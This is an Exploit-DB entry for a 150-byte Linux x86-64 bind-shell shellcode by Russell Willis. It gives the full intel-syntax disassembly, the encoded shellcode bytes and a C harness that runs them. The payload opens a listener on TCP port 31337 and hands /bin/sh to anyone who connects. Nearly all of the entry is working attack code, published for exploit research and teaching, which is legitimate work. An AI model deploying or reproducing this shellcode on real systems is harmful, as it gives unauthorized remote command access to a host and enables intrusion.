Linux/x64 - Bind (31337/TCP) Shell Shellcode (150 bytes)

EDB-ID:

43598

CVE:

N/A

EDB Verified:

Author:

Russell Willis

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86-64

Date:

2012-10-04

Vulnerable App: 
/*
Title   : tcpbindshell  (150 bytes)
Date    : 04 October 2013
Author  : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)

$ objdump -D tcpbindshell -M intel
tcpbindshell:     file format elf64-x86-64
Disassembly of section .text:

0000000000400080 <_start>:
  400080:   48 31 c0                xor    rax,rax
  400083:   48 31 ff                xor    rdi,rdi
  400086:   48 31 f6                xor    rsi,rsi
  400089:   48 31 d2                xor    rdx,rdx
  40008c:   4d 31 c0                xor    r8,r8
  40008f:   6a 02                   push   0x2
  400091:   5f                      pop    rdi
  400092:   6a 01                   push   0x1
  400094:   5e                      pop    rsi
  400095:   6a 06                   push   0x6
  400097:   5a                      pop    rdx
  400098:   6a 29                   push   0x29
  40009a:   58                      pop    rax
  40009b:   0f 05                   syscall 
  40009d:   49 89 c0                mov    r8,rax
  4000a0:   4d 31 d2                xor    r10,r10
  4000a3:   41 52                   push   r10
  4000a5:   41 52                   push   r10
  4000a7:   c6 04 24 02             mov    BYTE PTR [rsp],0x2
  4000ab:   66 c7 44 24 02 7a 69    mov    WORD PTR [rsp+0x2],0x697a
  4000b2:   48 89 e6                mov    rsi,rsp
  4000b5:   41 50                   push   r8
  4000b7:   5f                      pop    rdi
  4000b8:   6a 10                   push   0x10
  4000ba:   5a                      pop    rdx
  4000bb:   6a 31                   push   0x31
  4000bd:   58                      pop    rax
  4000be:   0f 05                   syscall 
  4000c0:   41 50                   push   r8
  4000c2:   5f                      pop    rdi
  4000c3:   6a 01                   push   0x1
  4000c5:   5e                      pop    rsi
  4000c6:   6a 32                   push   0x32
  4000c8:   58                      pop    rax
  4000c9:   0f 05                   syscall 
  4000cb:   48 89 e6                mov    rsi,rsp
  4000ce:   48 31 c9                xor    rcx,rcx
  4000d1:   b1 10                   mov    cl,0x10
  4000d3:   51                      push   rcx
  4000d4:   48 89 e2                mov    rdx,rsp
  4000d7:   41 50                   push   r8
  4000d9:   5f                      pop    rdi
  4000da:   6a 2b                   push   0x2b
  4000dc:   58                      pop    rax
  4000dd:   0f 05                   syscall 
  4000df:   59                      pop    rcx
  4000e0:   4d 31 c9                xor    r9,r9
  4000e3:   49 89 c1                mov    r9,rax
  4000e6:   4c 89 cf                mov    rdi,r9
  4000e9:   48 31 f6                xor    rsi,rsi
  4000ec:   6a 03                   push   0x3
  4000ee:   5e                      pop    rsi
00000000004000ef <doop>:
  4000ef:   48 ff ce                dec    rsi
  4000f2:   6a 21                   push   0x21
  4000f4:   58                      pop    rax
  4000f5:   0f 05                   syscall 
  4000f7:   75 f6                   jne    4000ef <doop>
  4000f9:   48 31 ff                xor    rdi,rdi
  4000fc:   57                      push   rdi
  4000fd:   57                      push   rdi
  4000fe:   5e                      pop    rsi
  4000ff:   5a                      pop    rdx
  400100:   48 bf 2f 2f 62 69 6e    movabs rdi,0x68732f6e69622f2f
  400107:   2f 73 68 
  40010a:   48 c1 ef 08             shr    rdi,0x8
  40010e:   57                      push   rdi
  40010f:   54                      push   rsp
  400110:   5f                      pop    rdi
  400111:   6a 3b                   push   0x3b
  400113:   58                      pop    rax
  400114:   0f 05                   syscall 

  Code not is not optimal, this is left as an exercise to the reader ;^)
  
*/

#include <stdio.h>
  
#define PORT "\x7a\x69" /* 31337 */
  
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
 
int
main(void)
{
    printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services